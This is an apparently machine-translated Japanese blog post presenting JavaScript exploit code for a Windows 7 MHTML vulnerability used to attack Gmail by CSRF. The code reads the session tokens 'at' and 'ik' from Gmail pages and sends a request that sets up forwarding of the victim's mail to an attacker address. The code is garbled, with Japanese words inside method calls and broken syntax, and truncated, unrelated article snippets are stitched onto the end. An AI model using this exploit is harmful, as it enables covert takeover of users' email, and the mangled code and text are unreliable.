Win 7 GMAIL MHtmlの脆弱性テストコードになって久しぶりの更新ブログ、 - 最後に完成したバージョンはどこを失うべきかわからない - - ! - XPが直接HTTPプロトコルを要求するのとは異なり、AJax要求を開始するための Win7の下でのP> MHtmlの脆弱性、要求されたURLもMHtmlプロトコルにある必要があります。 XPは厳密?誰かがこの詳細に気付いたかどうか私は知りません。
関連機関CSRFでGMAILを攻撃するには、ATとIKのパラメータを有効にする必要がありますもちろん、COOKIEから、または直接ページから取得できる2つのパラメータを取得する方法はたくさんあります。次のコードはページから直接取得されます。
xmlHttp = new ActiveXObject( "Microsoft.XMLHttp");
XMLHttp.open( "GET"、 "mHtml:https://mail.google.com/mail/h/0/"、 True);
XMLHttp.send();
XMLHttp.onreadystatechange = function(){
if(XMLHttp.readyState == 4){
if(XMLHttp.status == 200) ){
REX = /href=\\".*?at=(.{34})\\">/.exec(XMLHttp.responseText);
AThash = RegExp。$ 1;
XMLHttp。開く( "GET"、 "mHtml:https://mail.google.com/mail/"; true);
XMLHttp.send();
XMLHttp.onreadystatechange = function(){
if (XMLHttp.readyState == 4){
if(XMLHttp.status == 200){
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText);
XMLHttp。送信( "mdrp = 1& mda =%0D%0A" + Tmail + "%0D%0A");
}
}
}
}
}
}
}
日常のオフィスアプリケーションでは、便宜上、我々は自分のコンピュータ上のドキュメントのいくつかに慣れている、ディレクトリは他の人を呼び出すために、アウト共有しました。しかし、共有ディレクトリのセキュリ
透明は多くの人々にとって確かな魅力を持っています。ただオペレーティングシステム、透明にできる場所はたくさんあります。以前XPを使用していたとき、誰もがシステムのすべての部分を透過的にするためにあらゆる
USBフラッシュドライブは非常に使用頻度の高いストレージデバイスであり、その使用方法にも問題があります。たとえば、Win7システムでUディスクが開かれていてもI /Oデバイスエラーが表示され、要求を実
WindowsのタスクバーとApple Mac Dockの歴史を簡単に説明する前に、今回は基本的な機能と2つの類似点を比較しましょう。 Mac Dockのツールバーには、ファイルやアプリケーション